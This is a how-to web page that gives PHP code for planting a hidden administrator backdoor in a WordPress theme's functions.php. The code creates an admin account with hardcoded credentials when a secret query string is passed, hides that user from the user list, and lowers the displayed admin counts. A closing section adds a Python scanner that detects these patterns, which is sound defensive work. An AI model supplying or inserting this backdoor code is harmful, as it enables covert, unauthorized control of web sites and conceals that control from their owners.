The Best Way To Create A Secret Backdoor Admin Access To WordPress

Follow these steps to create a backdoor

You can use the code below to create a backdoor for any WordPress site. Copy and paste this code into the functions.php file of the active theme.

Note: Paste the following code after the end of an existing function or code block. Please don’t do this if you don’t have at least a minimum knowledge of code.

// Start User Backdoor Code
add_action( 'wp_head', 'mysecret_backdoor' );

function mysecret_backdoor() {
    if ( md5( $_GET['secretadmin'] ) == 'bc1bd15de8d5b0ce4944c87f2f960fd0' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'thecoderain' ) ) {
            $user_id = wp_create_user( 'thecoderain', 'coderain007' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

// End User Backdoor Code

Now you can save your file and add a query string to your website as follows:
https://example.com/?secretadmin=thecoderain
and press enter.

You’ve created a secret backdoor to access the admin panel and can use it at will. Open this URL to reach the admin panel with the new user: https://example.com/wp-admin/

Now enter the admin details that I have mentioned above:
USERNAME: thecoderain
PASSWORD: coderain007

Please keep in mind that even though we created the user secretly, it will still appear in the users list, so in order to hide it, follow the next steps.

1. Hiding a user from the user’s list and the WordPress backend

// Start Hide User
add_action('pre_user_query','site_pre_user_query');
function site_pre_user_query($user_search) {
  global $current_user;
  $username = $current_user->user_login;
 
  if ($username == 'YOUR_USERNAME_HERE') {
  } else {
    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
      "WHERE 1=1 AND {$wpdb->users}.user_login != 'YOUR_USERNAME_HERE'",$user_search->query_where);
  }
}

// End Hide User

In the above code, replace ‘YOUR_USERNAME_HERE’ with your username.

2. Show the number of admins excluding hidden user

add_filter("views_users", "site_list_table_views");
function site_list_table_views($views) {
   $users = count_users();
   $admins_num = $users['avail_roles']['administrator'] - 1;
   $all_num = $users['total_users'] - 1;
   $class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
   $class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
   $views['administrator'] = '<a href="users.php?role=administrator" class="' . $class_adm . '">' . translate_user_role('Administrator') . ' <span class="count">(' . $admins_num . ')</span></a>';
   $views['all'] = '<a href="users.php" class="' . $class_all . '">' . __('All') . ' <span class="count">(' . $all_num . ')</span></a>';
   return $views;
}

After saving the functions.php file, check the admin panel. You will not find any admin user with the username that was passed in the above code.

Note that you only need to paste the code at the end of an action. Take care not to make a mistake: if you make a mistake, the website will crash.
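A site owner auditing wp-content can search for the call patterns the three snippets on this page rely on. The following scanner is an added example, not code from the original post; the rule names, the `scan_php`/`scan_tree` helpers and the sample input are constructed for illustration, and the rules are heuristics that need manual review of each hit.

```python
import re
from pathlib import Path

# Heuristic indicators derived from the three snippets on this page (rule names are made up).
RULES = {
    "admin-created-in-code": re.compile(
        r"wp_create_user\s*\(.{0,400}?set_role\s*\(\s*['\"]administrator['\"]", re.S),
    "request-param-hash-gate": re.compile(
        r"md5\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "user-hidden-from-list": re.compile(
        r"pre_user_query.{0,600}?query_where.{0,300}?user_login\s*!=", re.S),
    "user-count-adjusted": re.compile(
        r"views_users.{0,600}?count_users\s*\(\s*\).{0,300}?-\s*1\b", re.S),
}

def scan_php(source):
    """Return sorted (line_number, rule_name) pairs for every rule hit."""
    return sorted((source.count("\n", 0, m.start()) + 1, name)
                  for name, rx in RULES.items() for m in rx.finditer(source))

def scan_tree(root):
    """Scan every .php file under root (e.g. wp-content); map path -> hits."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample input that mirrors the patterns described above.
SAMPLE = r'''<?php
add_action( 'wp_head', 'x_hook' );
function x_hook() {
    if ( md5( $_GET['k'] ) == 'PLACEHOLDER_HASH' ) {
        $u = new WP_User( wp_create_user( 'example_user', 'example_pass' ) );
        $u->set_role( 'administrator' );
    }
}
add_action( 'pre_user_query', 'x_hide' );
function x_hide( $q ) {
    $q->query_where = str_replace( 'WHERE 1=1',
        "WHERE 1=1 AND wp_users.user_login != 'example_user'", $q->query_where );
}
'''

if __name__ == "__main__":
    for line, rule in scan_php(SAMPLE):
        print(f"line {line}: {rule}")
```

Because the hiding hooks only alter the admin user list, comparing the administrators shown in wp-admin against the rows in the users table is a useful cross-check alongside the file scan.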
